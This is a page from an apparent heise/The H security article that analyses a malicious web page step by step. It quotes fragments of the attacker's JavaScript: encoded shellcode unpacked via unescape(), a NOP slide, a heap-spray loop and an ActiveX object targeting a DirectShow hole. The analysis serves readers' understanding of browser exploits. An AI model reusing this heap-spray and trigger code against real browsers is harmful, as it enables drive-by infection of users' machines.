In association with heise online

Sprayer at work

So the only reason for obfuscating all this code is the integration of another iFrame. We start again at the beginning: Download file and open in editor. What we find is another long block of encoded characters:

var z4wurLU =
"%uA164%u0018%u0000%u408B%u8B30
[ ... ]
%u6944%u6572%u7463%u5F58%u5344";

And this time, the whole thing is unpacked via unescape():

var ZqEs8Ui = unescape(z4wurLU);

However, these encoded hex values look more like shellcode to me – machine-code instructions that are to be injected via a security hole and then executed. The next line confirms this:

var D4aFw4Q = unescape("%u9" + "090%u9" + "09" + "0");

It contains several instances of the 0x90 hex code. This is the sequence for the x86 machine instruction "No Operation" – that is, "do nothing", called NOP in short. Many exploits use this instruction as a filler. Then another loop:

while(...)D4aFw4Q += D4aFw4Q;

Since this is nested in a further loop, the hdwPhXe variable ends up receiving several thousand NOP instructions. I knew it – this is somebody building what is called a NOP slide.


Zoom Heap spraying prepares the working memory in such a way that an untargeted jump is bound to lead to on one of the NOP slides that end in shell code.
NOP slides are often used in heap spraying attacks. Exploit authors tend to face the problem that, although they can redirect a jump in the regular code, they don't quite know where to jump to. It is usually impossible to predict which memory address the exploit code will end up in.

Therefore, authors simply overwrite the entire memory with a large number of these long do-nothing slides and place the intended code at the end. Then they instruct the program to jump to a random address, knowing that it is bound to hit one of the slides, do "nothing" a few thousand times and finally end up at the injected code.

And here's the heap spraying:

var fa5iZhc = new Array();
for (IF7Dfmj = 0; IF7Dfmj < 350; IF7Dfmj++ ){
fa5iZhc[IF7Dfmj] = hdwPhXe + ZqEs8Ui
}

This code sets up 350 of these slides in memory, each of them including a few thousand NOPs and then the shellcode from ZqEs8Ui. The stage is set for the main act! And here it is:

var bC44pzT = document.createElement('object');
....
bC44pzT.data = 'dx_ds.gif';
bC44pzT.classid = 'clsid:0955AC62-BF2E- 4CBA-A2B9-A63F772D46CF';

One of the first hits when searching the internet for class ID 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF is : Web pages infect Windows PCs via new DirectShow hole

Next: Gotcha!

Print Version | Permalink: http://h-online.com/-1019940
  • Twitter
  • Facebook
  • submit to slashdot
  • StumbleUpon
  • submit to reddit
 


  • July's Community Calendar





The H Open

The H Security

The H Developer

The H Internet Toolkit